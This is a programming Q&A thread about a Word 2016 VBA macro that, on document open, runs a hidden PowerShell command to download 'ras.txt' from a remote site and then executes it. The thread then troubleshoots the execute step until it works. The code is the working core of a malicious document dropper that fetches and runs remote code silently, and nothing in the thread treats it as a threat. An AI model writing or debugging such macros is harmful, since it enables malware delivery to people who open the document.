# Run Time Error 5 - Invalid Procedure Call or Argument - Word2016

Tags: vba, powershell, ms-word

I was trying to download a txt file when the document is open, i use Powershell through VBA to make this.

the first step to download the file is working but the second step is to execute(run) the txt file is not working and it gives me the error

> Run Time Error 5 - Invalid Procedure Call or Argument

my Code:

```
Dim str As String


str = "powershell (New-Object System.Net.WebClient).DownloadFile('mysite.net/ras.txt','ras.txt')"
Shell str, vbHide

Dim exePath As String
exePath = ActiveDocument.Path + "\ras.txt"
Shell exePath, vbNormalFocus
```

when i press debug it gives me the error is from the last line

> Shell exePath, vbNormalFocus

Comment: The current location paths for Word and PowerShell are most likely different, so always use **absolute** full paths. Also, check what you get for `ActiveDocument.Path + "\ras.txt"`. Is that the same as where you let PowerShell to?

Comment: @Theo but the first download file is working well but when i try to open the downloaded file it gives me the error, i also check the result of exePath its correct and where the word file located

Comment: `exePath` may be the path where the word file is located, but will not be the path where you have downloaded the file since you're telling PowerShell to use a relative path to PowerShell to download there. Again, a path relative to one application may be and in this case really **is** different to that of another application. Use **absolute** paths

Answer (score 0, accepted):

the problem was is that i didn't save the word file so there is no filepath for it, i just was need to save file first then run the above macro and the problem was fixed .

Comment: Yeah you have to remember to hit save.